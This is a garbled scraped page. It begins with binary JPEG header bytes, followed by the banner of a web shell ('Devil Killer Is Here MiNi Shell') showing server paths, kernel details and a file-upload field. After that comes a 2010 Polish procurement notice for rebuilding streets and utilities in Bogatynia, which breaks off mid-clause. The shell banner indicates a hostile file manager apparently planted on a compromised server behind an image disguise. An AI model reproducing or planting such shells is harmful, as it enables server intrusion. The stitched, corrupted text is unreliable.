JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100611/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100611/150835-N-2010.html

<p class="kh_header"><b>Bogatynia: Przebudowa ulic: II Armii Wojska Polskiego, Daszyńskiego, Zygmuntowskiej, Pastwiskowej oraz 3-go Maja w Bogatyni wraz z wymianą uzbrojenia podziemnego.</b><br>
<b>Numer ogłoszenia: 150835 - 2010; data zamieszczenia: 11.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bogatynia , ul. Daszyńskiego 1, 59-920 Bogatynia, woj. dolnośląskie, tel. 075 7733961, 7739480, faks 075 77 39480, 7731945.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bogatynia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ulic: II Armii Wojska Polskiego, Daszyńskiego, Zygmuntowskiej, Pastwiskowej oraz 3-go Maja w Bogatyni wraz z wymianą uzbrojenia podziemnego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.	Zakres przedmiotu zamówienia obejmuje:       
I.	Branża drogowa która winna być realizowana w ramach etapach:  
Etapy obejmują:
1 ) Przebudowę nawierzchni ulic Daszyńskiego i  II AWP  polegającą  na odnowie nawierzchni jezdni na całej długości oraz odbudowie nawierzchni chodników i placów, miejsc postojowych , terenów zielonych po budowie projektowanych sieci podziemnych. Odnowa nawierzchni jezdni polega na frezowaniu istniejącej nawierzchni z mieszanek mineralno - asfaltowych na pełną grubość ( 4- 8 cm ). frezowana z nawierzchni bitumicznej podlega utylizacji. Na sfrezowanej nawierzchni należy wykonać nową nawierzchnię bitumiczną tj. warstwę profilująco - wyrównawczą średniej grub. 2 cm - ( ok. 50 kg masy bitum./m 2 ), wklejenie geosiatki wzmacniającej do nawierzchni bitumicznych, warstwy wiążącej grub. 6 cm i warstwy ścieralnej SMA grub. 4 cm.  Zaprojektowano parametry techniczne i użytkowe odpowiadające klasie Z - zbiorcza.
Powierzchnia elementów podlegających przebudowie:
- jezdnia  13.474 m2 
- chodniki  11.282,00 m2 , do przełożenia 1128,20m2 
- tereny zielone  / trawniki 800,00m2 
Długość zamontowanych elementów liniowych:
- krawężniki  3390,5 mb, do przełożenia 340,00 mb    
- obrzeża    1446,80 mb, do przełożenia 205,00 mb 
- ścieku przykrawężnikowego   2312,83 mb
Długość wyżej wymienionego  odcinka   do przebudowy to około:  1380,00 mb.       Tereny i budynki posadowione po prawej stronie ul. Daszyńskiego od skrzyżowania z ul. Pocztową do skrzyżowania z ul. Dworcową znajdują się na obszarze urbanistycznym wpisanym do rejestru zabytków. Przedsięwzięcie uzyskało Decyzję nr 202/09 Dolnośląskiego Wojewódzkiego Konserwatora Zabytków we Wrocławiu. PZT określa również odtworzenie nawierzchni po robotach sieciowych w ulicach bocznych, które są zaznaczone odpowiednimi kolorami w zależności od charakteru drogi , czy chodnika. Odcinki te uwzględnione są w przedmiarach robót w projektach budowlanych i wykonawczych. 
W obrębie ulicy Daszyńskiego:   
      - nawierzchnie z mieszanek mineralno - bitumicznych asfaltowych gr. 11 cm ( kolor niebieski )                         to około:  94,0 m2 
      - nawierzchnie z kostki betonowej gr. 8 cm to około:  674,0 m2   
W obrębie ulicy II AWP :
       - nawierzchnia z mieszanek mineralno - bitumicznych asfaltowych gr. 4 cm ( kolor żółty )                                     to około:  1245 m2   
      - nawierzchnie z mieszanek mineralno - bitumicznych asfaltowych gr. 11 cm ( kolor niebieski )                         to około:  184 m2 
      - nawierzchnie z kostki betonowej gr. 8 cm to około:  360 m2 
      - nawierzchnie z mieszanek mineralno - bitumicznych gr. 6 cm to około: 135m2  ( kolor żółty )   
Oznakowanie pionowe i poziome zgodnie z zatwierdzonym projektem organizacji ruchu docelowego - Zatwierdzenie Nr 12/S/2009 z dnia 08 lipca 2009r.  
2 )  Przebudowa nawierzchni ulic Zygmuntowskiej i Pastwiskowej.
2.1)  ul. Zygmuntowska -  kategoria drogi : droga gminna klasy ulicy D - dojazdowa.                 Roboty polegają na przebudowie nawierzchni jezdni oraz przebudowie nawierzchni chodników. Od budynku nr 1 na działce nr 36/2 ulica przechodzi w ciąg pieszo -  jezdny o szer. 5,00 m.
Powierzchnia elementów podlegających przebudowie:
- jezdnia to około:  2420,00 m2 
- chodniki to około:  257,00 m2   
- tereny zielone/ trawniki to około:  210,00m2 
Długość zamontowanych elementów liniowych:
- krawężniki to około:   615,00 mb,     
- obrzeża chodnikowe to około:  120,00 mb,  
- ścieku przykrawężnikowego  to około:  500,00 mb
Długość odcinka do przebudowy to około:  249,00 mb
Odtworzenie nawierzchni z betonu asfaltowego ( kolor niebieski na PZT ) 
- nawierzchnie  z mieszanek mineralno - bitumicznych asfaltowych o gr. 11 cm to około:  17 m2  
2.2)  ul. Pastwiskowa - kategoria drogi - droga gminna klasy D - dojazdowa.                              Roboty  polegają  na przebudowie konstrukcji nawierzchni jezdni i chodników.                     Powierzchnia elementów podlegających przebudowie:
- jezdnia   1453,60 m2 ( ciąg pieszo - jezdny ) 
Długość zabudowanych elementów liniowych:
- krawężniki  to około:  380,00 mb
- obrzeża chodnikowe to około:   250, 00 mb
- ścieku przykrawężnikowego to około:   390,00 mb
Długość odcinka do przebudowy to około:  390,00 mb       
Odtworzenie nawierzchni z betonu asfaltowego ( kolor niebieski na PZT ) 
- nawierzchnia z betonu asfaltowego gr. 11 cm to około:  19 m2   
Przekroje konstrukcyjne: jezdni ( ul. Zygmuntowska, ul Pastwiskowa ):
- kostka betonowa brukowa, grub. 8 cm;
- podsypka piaskowa, grub. 3 cm;
- podbudowa z kruszywa łamanego 0 - 31,5 mm, grub. 20 cm, stabilizowana mechanicznie;
- stabilizacja kruszywa naturalnego cementem ( stabilizacja  towarowa , wykonana w wytwórni ) grub. 15 cm.  )   
 chodnik ( ul. Zygmuntowska ) 
- kostka betonowa brukowa, grub. 8 cm;
- podsypka piaskowa, grub. 3 cm;
- podbudowa z kruszywa łamanego 0 - 31,5 mm, stabilizowana mechanicznie grub. 10 cm.
3 ) przebudowa ul.  Fabrycznej.  
W ulicy prowadzone będą roboty odtworzeniowe polegające na korytowaniu w istniejącej podbudowie do poziomu spodu warstw konstrukcyjnych i zbudowaniem warstw konstrukcyjnych. 
 - rozbiórka nawierzchni bitumicznych ;
- korytowanie;
- podbudowa z kruszywa łamanego;
- wzmocnienie mas bitumicznych;
- nawierzchnie z betonu asfaltowego - warstwa wiążąca grub.  6 cm  to około:  302,260 m2 ;
- nawierzchnia z betonu asfaltowego - warstwa ścieralna grub. 5 cm to około:  302,260 m2 ;
inne roboty określone w projektach i przedmiarach robót.
Docelowa ( stała organizacja ruchu nie ulega zmianie w stosunku do istniejącej poza uzupełnieniem znaków pionowych i korektą oznakowania poziomego)      
4 ) przebudowa ul. 3 - go Maja 
Roboty związane z przebudową drogi. 
- roboty rozbiórkowe chodników, krawężników, obrzeży betonowych, nawierzchni mineralno - bitumicznych;
- krawężniki betonowe 15 x 30 cm to  około:   883,30 mb;
- obrzeża betonowe 8 x 30 cm to  około:  399 mb;
- nawierzchnie z kostki betonowej gr. 8 cm to  około:  755 m2 ;
- nawierzchnie z kostki betonowej gr. 8 cm ( przełożenie nawierzchni ) to około: 182 m2 ;
- nawierzchnie z mieszanek mineralno - bitumicznych to około:  2280 m2 ;
 4. 1 ) przebudowa ul. 3 -go Maja - Plac manewrowy przy garażach.
- roboty rozbiórkowe, ziemne;
- nawierzchnie z kostki betonowej gr. 8 cm to  około:  459 m2 ;
- regulacje pionowe studzienek, kratek ściekowych, włazów ulicznych,;
- odwodnienie terenu z rur PVC o śr. zewn. 160 mm to około 47 mb;
4. 2 ) przebudowa ul. 3 - go Maja - Plac postojowy + plac kontenerowy.
- roboty rozbiórkowe, ziemne;
- nawierzchnie z kostki betonowej gr. 8 cm to  około - 306 m2 
4. 3 ) przebudowa ul. 3 - go Maja - Oznakowanie pionowe i poziome.
- słupki do znaków, tablice znaków drogowych - 12 szt.;
- mechaniczne malowanie linii na skrzyżowaniach i przejściach dla pieszych farbą chlorokauczukową - około 45 m2 .        
II Branża sanitarna która winna być realizowana w ramach etapach:
1 ) ul. Daszyńskiego.
- roboty ziemne;
- sieci wodociągowe wraz z osprzętem  z rur polietylowych ( PE, PEHD ) śr. zewn. od 40 mm  do 160 mm - około 636 mb;
- przyłącza wodociągowe wraz z osprzętem  z rur ciśnieniowych PE  śr. zewn. od 32 mm - do 50 mm  około 172 mb;
- kanalizacja sanitarna wraz z przykanalikami rury PVC o śr. od 200 mm   do 250 mm  około 44 mb;
- kanalizacja deszczowa wraz z przykanalikami rury PVC o śr. od 200 mm  do 250 mm około 86 mb  
2 )  ul. II Armii Wojska Polskiego.
- roboty ziemne;
- sieci wodociągowe wraz z osprzętem z rur polietylenowych ( PE, PEHD )  śr. zewn. od 40 mm - do 160 mm - około 1596 mb;
- przyłącza wodociągowe wraz z osprzętem z rur ciśnieniowych PE śr. zewn. od 32 mm - do 40 mm   około 223,07 mb;
 - kanalizacja sanitarna wraz z przykanalikami rury PVC o śr. od 200 mm do 400 mm około 298 mb;
-  kanalizacja deszczowa wraz z przykanalikami rury PVC o śr. od 200 mm do 315 mm 280 mb
3 ) ul. Zygmuntowska. 
- roboty ziemne ;
- sieci wodociągowe wraz z osprzętem z rur polietylenowych ( PE, PEHD )  śr. zewn. od 63 mm - do 160 mm około 245 mb; 
- przyłącza wodociągowe wraz z osprzętem z rur ciśnieniowych PE śr. zewn. 32 mm                 około - 54 mb;
- kanalizacja sanitarna wraz z przykanalkami rury PVC o śr. 160 mm - około 26 mb oraz rury PP dwuścienne np. Wavin X Stream o śr. dz 200 SN8 około 79 mb;
- kanalizacja deszczowa wraz z przykanalikami o śr. od 160 mm do 200 mm - około 71 mb oraz rury PP o śr. 250 mm np. Wavin X - Stream SN8 około 220 mb;
4 )  ul. Pastwiskowa.
 - roboty ziemne;
 - sieci wodociągowe wraz z osprzętem z rur polietylenowych ( PE, PEHD )  śr. zewn. od 90 mm - do 160 mm - około 304 mb;
- przyłącza wodociągowe wraz z osprzętem z rur ciśnieniowych PE śr. zewn. 32 mm - około 106 mb;
- kanalizacja sanitarna wraz z przykanalikami rury PVC o śr. od 160 mm do 315 mm - około 88 mb oraz rury PP dwuścienne np. Wavin X - Stream o śr. dz. 200 SN8  - około 14 mb;
- kanalizacja deszczowa wraz z przykanalikami o śr . od 160 mm do 500 mm  z rur PP Wavin X - Stream SN 8 około - 343 mb;
- dostawa i montaż separatora koalescencyjnego z integrowanym osadnikiem i pięciokrotnym by - passem o Qn / Qmax = 15,0/75,0l/s - kpl 1;
- dostawa i montaż separatora koalescencyjnego z integrowanym osadnikiem i pięciokrotnym by- pasem o Qn / Qmax = 50,0 / 250 l/s - kpl 1; 
- przebudowa linii kablowych SN 20 kV L - 73402 - około 57 mb;  
5 )  ul. 3 -go Maja 
- roboty ziemne;
- sieci wodociągowe wraz z osprzętem z rur polietylenowych ( PE, PEHD ) śr. zwen. 125 mm - około - 204 mb;
- przyłącza wodociągowe wraz z osprzętem z rur PE śr. zewn. 32 mm - około 63 mb
- kanalizacja deszczowa wraz z przykanalikami o śr. zewn 200 mm - około 16 mb, studzienki ściekowe o śr. 500 mm z osadnikiem bez syfonu szt. 6;
 5.1 ) - ul. 3 - go Maja plac manewrowy przy garażach 
- roboty ziemne;
- kanały z rur PVC wraz osprzętem  o śr. zewn. 160 mm - około 47 mb;
- studzienki kanalizacyjne systemowe Vawin o śr. 315 - 425 mm - szt. 7 
 5. 2 ) ul. 3 -go Maja odwodnienie fragmentu ulicy na działce 35  ( w rejonie budynków  nr 4, 5 );
- roboty ziemne;
- kanały z rur PVC wraz osprzętem o śr. od 160 mm  do 250 mm  - około 80 mb;
- studzienki kanalizacyjne systemowe Vawin o śr. 315 - 425 mm - 5 szt.;
- studzienka kanalizacyjna Vawin - Tegra  o  śr. 1000 mm - 1 szt.
6 ) ul. Fabryczna 
- roboty ziemne;
- sieci wodociągowe wraz z osprzętem z rur PE, PEHD  śr. zewn. 125 mm - około 147 mb;
- przyłącza wodociągowe wraz z osprzętem z rur PE śr. 32 mm - około 15 mb;
- kanalizacja deszczowa  (odwodnienie ulicy ) kanały z rur PVC o śr.  zewn. 200 mm - około 16 mb      
7) inne roboty określone w Projektach Budowlanych, Projektach Wykonawczych, Specyfikacji Technicznej Wykonywania i Odbioru Robót oraz w Przedmiarach Robót.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.11.10-9, 45.23.22.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 200 tyś zł.wpłaty</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisał sposobu oceny tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykażą , że posiadają wiedzę i doświadczenie na potwierdzenie,  których udokumentują wykonanie tj. zakończenie w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, min. 1  roboty budowlanej obejmującej n/w  zakres w ramach jednej umowy:
- budowę lub przebudowę drogi  klasy -Z- lub wyższej o nawierzchni z mieszanek mineralno - bitumicznych lub asfaltowo - betonowych;
- budowę drogi z kostki betonowej gr.8 cm.;
- budową lub przebudową sieci wodociągowej wraz z przyłączami;
- budowę lub przebudowę sieci sanitarnej lub deszczowej wraz z przykanalikami.
o wartości nie mniejszej niż 5 mln zł. 
Wykazane przez Wykonawcę roboty budowlane muszą być poparte dokumentami potwierdzającymi, że roboty te wykonane zostały zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (np. referencje, protokoły odbioru robót)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisał sposobu oceny tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują osobami zdolnymi do wykonania zamówienia, posiadającymi prawo do wykonywania samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi  wpisanymi na okręgową listę członków samorządu zawodowego - Okręgowej Izby Inżynierów, które  będą posiadać  określone przepisami Prawa budowlanego uprawnienia do pełnienia obowiązku:
	Kierownik budowy posiadający, co najmniej:
-uprawnienia budowlane do kierowania robotami w specjalności drogowej (zgodne z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie [Dz. U. z dnia 16 maja 2006 r. Nr 83 poz. 578]) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, odpowiednio w zakresie drogowym, oraz aktualny wpis do właściwej Izby Samorządu Zawodowego;
-  łącznie 5 lat doświadczenia zawodowego jako kierownik budowy.

	Kierownik robót sanitarnych posiadający, co najmniej:
-uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (zgodne z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie [Dz. U. z dnia 16 maja 2006 r. Nr 83poz. 578]) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa w zakresie instalacji wod-kan., aktualny wpis do właściwej Izby Samorządu Zawodowego;
-  łącznie 3 lata doświadczenia zawodowego jako kierownik robót sanitarnych.

	Kierownik robót elektrycznych posiadający, co najmniej:
-uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych (zgodne z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie [Dz. U. z dnia 16 maja 2006 r. Nr 83poz. 578]) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa w zakresie sieci i urządzeń elektrycznych, aktualny wpis do właściwej Izby Samorządu Zawodowego;
- łącznie 3 lata doświadczenia zawodowego jako kierownik robót elektrycznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisał sposobu oceny tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian:
21.5.5.1. Termin wykonania przedmiotu umowy może ulec zmianie w przypadku wystąpienia przypadków wynikających z:.
1) przestojów i opóźnień zawinionych przez Zamawiającego;
2) działania siły wyższej. Przez siłę wyższą rozumie się okoliczności niemożliwe do przewidzenia w chwili zawarcia umowy, niezależnie od stron, na których powstanie strony nie miały wpływu i których powstaniu nie mogły zapobiec; za siłę wyższą w rozumieniu umowy uważa się również klęski żywiołowe, katastrofy, decyzje i akty pochodzące od organów władzy lub administracji wydane zgodnie z kompetencjami tych organów mające wpływ na terminowość wykonywania robót;
